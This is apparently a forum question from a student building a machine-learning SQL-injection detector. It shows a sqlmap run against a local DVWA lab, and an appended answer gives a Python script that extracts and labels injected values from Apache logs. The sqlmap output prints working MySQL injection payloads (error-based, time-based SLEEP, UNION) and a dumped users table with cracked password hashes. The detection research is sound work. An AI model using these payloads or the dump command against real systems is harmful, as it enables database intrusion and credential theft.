How can I get SQL injection attack data by using sqlmap?


I'm writing a thesis for my university. The theme of my thesis is "SQL injection detection by using Machine Learning".

To use Machine Learning, first of all, I need thousands of samples of SQL injection attacks as learning data.

For that, I followed the process below.

  1. Install Virtual Box
  2. Install Kali Linux on Virtual Box
  3. Install DVWA (Damn Vulnerable Web Application) on Kali Linux
  4. Attack DVWA by using sqlmap

In step 4, I succeeded in attacking DVWA, but I don't know how to get a bunch of attack data. What I want to get is a bunch of actual attack SQL.

1. Launched the server.

┌──(rootkali)-[/home/kali]
└─# service apache2 start
                                             
┌──(rootkali)-[/home/kali]
└─# service mysql start  

2. Got the cookie and target URL

document.cookie
"security=low; PHPSESSID=cookieinfo"

3. Attack

┌──(rootkali)-[/usr/bin]
└─# sqlmap -o -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[cookieinfo];security=low" --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.11#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:08:01 /2020-12-01/

[10:08:01] [INFO] resuming back-end DBMS 'mysql' 
[10:08:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1995 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(1995=1995,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qoRd&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9863 FROM (SELECT(SLEEP(5)))PIFI)-- JYNK&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7162707a71,0x744e45686f7a55414a6744636c497367666d62567679764247415656677779516a76584474645269,0x71626a7871)#&Submit=Submit
---
[10:08:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:08:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:08:01] [INFO] fetching current database
[10:08:01] [INFO] fetching tables for database: 'dvwa'
[10:08:01] [INFO] fetching columns for table 'users' in database 'dvwa'
[10:08:01] [INFO] fetching entries for table 'users' in database 'dvwa'
[10:08:01] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[10:08:07] [INFO] writing hashes to a temporary file '/tmp/sqlmaphbMPEH3181/sqlmaphashes-7QbpSl.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:08:12] [INFO] using hash method 'md5_generic_passwd'
[10:08:12] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[10:08:12] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:08:12] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:08:12] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
Database: dvwa
Table: users
[5 entries]
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar                                  | user    | password                                    | last_name | first_name | last_login          | failed_login |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | /DVWA-master/hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2020-11-29 01:54:52 | 0            |
| 2       | /DVWA-master/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2020-11-29 01:54:52 | 0            |
| 3       | /DVWA-master/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2020-11-29 01:54:52 | 0            |
| 4       | /DVWA-master/hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2020-11-29 01:54:52 | 0            |
| 5       | /DVWA-master/hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2020-11-29 01:54:52 | 0            |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+

[10:08:12] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/users.csv'
[10:08:12] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[10:08:12] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment                 |
+------------+------+-------------------------+
| 1          | test | This is a test comment. |
+------------+------+-------------------------+

[10:08:13] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/guestbook.csv'                                                                                                                        
[10:08:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'

[*] ending @ 10:08:13 /2020-12-01/

What I want to get is a bunch of actual attack SQL. Can anyone please help me? Thank you.

0

There are 0 answers
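
For a detection dataset, the injected SQL can be collected from the server side of the lab described in the question, since the web server's access log records every request the detector would later have to classify. The following is an added example, not part of the original question: it assumes Apache's combined log format and that sqlmap ran with its default User-Agent (used here as the label); the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

# Path taken from the target URL in the question.
SQLI_PATH = "/DVWA-master/vulnerabilities/sqli/"

# Constructed sample lines (not real log data): one browser request,
# the time-based payload from the question sent twice, one unrelated page.
_ATTACK = ("id=1%27%20AND%20%28SELECT%209863%20FROM%20%28SELECT%28SLEEP"
           "%285%29%29%29PIFI%29--%20JYNK&Submit=Submit")
_PREFIX = '127.0.0.1 - - [01/Dec/2020:10:08:01 +0000] "GET '
_SQLMAP_UA = '"sqlmap/1.4.11#stable (http://sqlmap.org)"'
SAMPLE_LOG = [
    _PREFIX + SQLI_PATH + '?id=1&Submit=Submit HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
    _PREFIX + SQLI_PATH + '?' + _ATTACK + ' HTTP/1.1" 200 1500 "-" ' + _SQLMAP_UA,
    _PREFIX + SQLI_PATH + '?' + _ATTACK + ' HTTP/1.1" 200 1500 "-" ' + _SQLMAP_UA,
    _PREFIX + '/DVWA-master/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def extract_samples(lines, param="id"):
    """Return de-duplicated (decoded_value, label) pairs; label 1 = sent by sqlmap."""
    seen, samples = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        if url.path != SQLI_PATH:
            continue  # only the injectable endpoint is of interest
        # Assumption: default sqlmap User-Agent, which starts with "sqlmap/".
        label = 1 if m["agent"].lower().startswith("sqlmap/") else 0
        # parse_qs percent-decodes the value, giving the SQL as the app saw it.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if (value, label) not in seen:
                seen.add((value, label))
                samples.append((value, label))
    return samples


if __name__ == "__main__":
    for value, label in extract_samples(SAMPLE_LOG):
        print(label, value)
```

Only GET parameters appear in the access log, so this covers the GET-based `id` parameter from the question but not POST bodies or cookies.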